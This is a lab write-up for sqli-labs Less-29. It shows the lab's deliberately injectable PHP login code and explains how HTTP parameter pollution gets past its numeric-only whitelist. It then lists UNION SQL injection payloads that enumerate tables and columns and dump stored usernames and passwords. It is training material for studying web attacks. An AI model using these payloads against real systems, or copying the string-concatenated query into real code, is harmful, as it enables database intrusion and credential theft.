SQL injection less29 (parameter pollution bypasses WAF)

Pre knowledge ：Try to Hack】HTTP Parameter pollution

There are three documents login.php、hacked.php、index.php

login.php

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
//disable error reporting
error_reporting(0);

// take the variables 
if(isset($_GET['id']))
{
    
	$qs = $_SERVER['QUERY_STRING'];
	$hint=$qs;
	$id1=java_implimentation($qs);
	$id=$_GET['id'];
	//echo $id1;
	whitelist($id1);
	

// connectivity 
	$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
	$result=mysql_query($sql);
	$row = mysql_fetch_array($result);
	if($row)
	{
    
	  	echo "<font size='5' color= '#99FF00'>";	
	  	echo 'Your Login name:'. $row['username'];
	  	echo "<br>";
	  	echo 'Your Password:' .$row['password'];
	  	echo "</font>";
  	}
	else 
	{
    
		echo '<font color= "#FFFF00">';
		print_r(mysql_error());
		echo "</font>";  
	}
}
	else {
     echo "Please input the ID as parameter with numeric value";}


//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
function whitelist($input)
{
    
	$match = preg_match("/^\d+$/", $input);
	if($match)
	{
    
		//echo "you are good";
		//return $match;
	}
	else
	{
    	
		header('Location: hacked.php');
		//echo "you are bad";
	}
}



// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string)
{
    
	$q_s = $query_string;
	$qs_array= explode("&",$q_s);


	foreach($qs_array as $key => $value)
	{
    
		$val=substr($value,0,2);
		if($val=="id")
		{
    
			$id_value=substr($value,3,30); 
			return $id_value;
			echo "<br>";
			break;
		}

	}

}

?>

First of all, let's analyze whitelist function

function whitelist($input)
{
    
	$match = preg_match("/^\d+$/", $input);
	if($match)
	{
    
		//echo "you are good";
		//return $match;
	}
	else
	{
    	
		header('Location: hacked.php');
		//echo "you are bad";
	}
}

Ask for our id It must be a number , Or jump to hacked.php Interface

	$qs = $_SERVER['QUERY_STRING'];
	$hint=$qs;
	$id1=java_implimentation($qs);
	$id=$_GET['id'];
	//echo $id1;
	whitelist($id1);

$_SERVER['QUERY_STRING'] It is our GET All parameters of parameter transfer

java_implimentation function , Want to simulate HTTP Different parsing results of another Middleware in parameter pollution （ Because our current real environment is only Apache,Apache When the parameter of is polluted, it is resolved as last）, This function is simulated and resolved as first

// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string)
{
    
	$q_s = $query_string;
	$qs_array= explode("&",$q_s);


	foreach($qs_array as $key => $value)
	{
    
		$val=substr($value,0,2);
		if($val=="id")
		{
    
			$id_value=substr($value,3,30); 
			return $id_value;
			echo "<br>";
			break;
		}

	}

}

	$id1=java_implimentation($qs);
	whitelist($id1);

So we ?id=11&id=payload
Just forgive this WAF 了

?id=1&id=-1' union select 1,2,3--+
And then do the routine UNION Just inject

?id=1&id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

?id=1&id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=1&id=-1' union select 1,2,group_concat(username,0x3a,password) from security.users --+